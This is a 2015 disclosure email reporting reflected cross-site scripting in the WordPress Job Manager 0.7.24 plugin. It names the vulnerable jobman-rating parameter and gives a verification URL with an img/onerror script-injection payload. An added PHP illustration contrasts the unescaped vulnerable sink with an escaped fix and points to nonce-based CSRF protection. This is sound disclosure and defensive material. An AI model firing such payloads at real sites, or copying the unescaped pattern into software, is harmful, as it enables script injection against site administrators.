Subject: Cross-Site Scripting (XSS) in Job Manager 0.7.24
Date: Tue, 25 Aug 2015 14:28:52 +0200

Hello,

Plugin: Job Manager 0.7.24 https://wordpress.org/plugins/job-manager/

1. Reflected Cross-Site Scripting (XSS)

Authenticated administrators can inject HTML/JavaScript code (there is no CSRF protection!).

Method: GET
URL: http://localhost/wp-admin/admin.php?page=jobman-list-applications&jobman-rating=[xss]
Vulnerable parameters: jobman-rating

Example PHP callstack:
jobman_list_applications   [/job-manager/admin-applications.php:95]
jobman_print_rating_stars   [/job-manager/functions.php:60]

Verification:
http://localhost/wp-admin/admin.php?page=jobman-list-applications&jobman-rating=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29+%2F%3E
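The following PHP is an added illustration, not the plugin's own code: it reconstructs the kind of sink the callstack above points at (a query parameter written straight into an HTML attribute while rendering rating stars) next to a hardened version. The function names, the markup and the `data-rating` attribute are assumptions; only the decoded payload from the verification URL comes from this advisory. Under plain `php` the script falls back to `htmlspecialchars()`; inside WordPress the real `esc_attr()` and `absint()` are used.

```php
<?php
// Added example (not from Job Manager): unescaped query parameter in an
// attribute vs. the hardened variant. Run with: php xss-rating.php

// Fallbacks so the script runs outside WordPress; WordPress defines both.
if (!function_exists('esc_attr')) {
    function esc_attr($text) {
        return htmlspecialchars((string) $text, ENT_QUOTES, 'UTF-8');
    }
}
if (!function_exists('absint')) {
    function absint($n) {
        return abs((int) $n);
    }
}

// Vulnerable pattern (hypothetical reconstruction of the reported sink):
// whatever arrived in jobman-rating is echoed into the attribute verbatim,
// so a value containing `">` closes the attribute and tag and injects markup.
function print_rating_stars_vulnerable($rating) {
    $html = '';
    for ($i = 1; $i <= 5; $i++) {
        $html .= '<img src="star.png" data-rating="' . $rating . '" alt="star" />';
    }
    return $html;
}

// Hardened pattern: a rating is a small integer, so coerce it to one first
// (absint, clamped to the valid range) and still escape the attribute value
// (esc_attr) so the output is safe even if the type assumption ever changes.
function print_rating_stars_safe($rating) {
    $rating = min(absint($rating), 5);
    $html = '';
    for ($i = 1; $i <= 5; $i++) {
        $html .= '<img src="star.png" data-rating="' . esc_attr($rating) . '" alt="star" />';
    }
    return $html;
}

// Constructed input: the URL-decoded value from the verification URL above.
$payload = '"><img src=x onerror=alert(1) />';
$tainted = isset($_GET['jobman-rating']) ? $_GET['jobman-rating'] : $payload;

echo "vulnerable output:\n" . print_rating_stars_vulnerable($tainted) . "\n\n";
echo "hardened output:\n" . print_rating_stars_safe($tainted) . "\n";
```

In the vulnerable output the payload breaks out of `data-rating="..."` and lands as a live `<img onerror>` element; in the hardened output the same input becomes `data-rating="0"`. The CSRF remark in the advisory is a separate layer: an admin page that reacts to GET parameters should also carry a WordPress nonce (`wp_nonce_url()` when building the link, `check_admin_referer()` when handling the request), so a crafted link opened by a logged-in administrator is refused before any parameter is rendered.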

--
Regards,
Marcin Probola